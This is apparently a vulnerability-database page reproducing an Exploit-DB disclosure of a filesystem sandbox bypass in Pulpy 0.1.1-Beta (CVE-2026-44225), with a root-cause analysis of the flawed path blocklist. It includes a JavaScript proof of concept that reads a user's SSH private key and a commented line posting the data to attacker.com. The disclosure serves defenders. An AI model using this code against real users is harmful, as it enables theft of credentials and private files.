| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2026-44225 | 12 May 202620:02 | – | attackerkb | |
| Pulpy 路径遍历漏洞 | 12 May 202600:00 | – | cnnvd | |
| CVE-2026-44225 | 12 May 202620:02 | – | cve | |
| CVE-2026-44225 Pulpy: Incomplete filesystem sandbox in pulpy.fs bridge allows packaged web apps to read arbitrary user files | 12 May 202620:02 | – | cvelist | |
| Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass | 6 Jul 202600:00 | – | exploitdb | |
| EUVD-2026-29801 | 12 May 202620:02 | – | euvd | |
| CVE-2026-44225 | 12 May 202620:16 | – | nvd | |
| PT-2026-40423 | 12 May 202600:00 | – | ptsecurity | |
| CVE-2026-44225 | 14 May 202619:58 | – | redhatcve | |
| CVE-2026-44225 Pulpy: Incomplete filesystem sandbox in pulpy.fs bridge allows packaged web apps to read arbitrary user files | 12 May 202620:02 | – | vulnrichment |
# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
# Google Dork: N/A
# Date: 2026-06-19
# Exploit Author: Onur BILICI @basekill
# Vendor Homepage: https://github.com/enesgkky/pulpy
# Software Link: https://github.com/enesgkky/pulpy
# Version: <= 0.1.1-Beta
# Tested on: macOS, Linux
# CVE: CVE-2026-44225
Description:
Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application,
granting it access to the host filesystem. A 'validateFsPath()' function is
implemented to sandbox this access using a blocklist. However, this blocklist
is incomplete.
The implementation only catches root-level paths (e.g., matching "/Library/"
at index 0), meaning it completely misses user-specific paths such as
"/Users/<username>/Library/" or critical configuration directories like
"~/.ssh/", "~/.aws/", and "~/Documents/".
As a result, any malicious web application packaged with Pulpy can bypass the
sandbox to read and write arbitrary sensitive files in the user's home directory.
Root Cause Analysis:
In 'src/bridge/native_modules.mm', the path validation logic relies on a weak
prefix check:
std::string normalized = fs::weakly_canonical(p).string();
if (normalized.find("/etc/") == 0 ||
normalized.find("/var/") == 0 ||
normalized.find("/usr/") == 0 ||
normalized.find("/System/") == 0 ||
normalized.find("/Library/") == 0) {
return "";
}
return normalized;
Proof of Concept (PoC):
An attacker can execute the following JavaScript code within a Pulpy-packaged
application to exfiltrate sensitive user data:
```javascript
// Bypassing the sandbox to read sensitive files from the user's home directory
try {
// Example target: SSH private key
// Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
const sshKeyPath = "/Users/<username>/.ssh/id_rsa";
pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
if (err) {
console.error("Failed to read file:", err);
return;
}
console.log("Successfully bypassed sandbox! Content:\n", data);
// Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
});
} catch (e) {
console.error("Exploit failed:", e);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation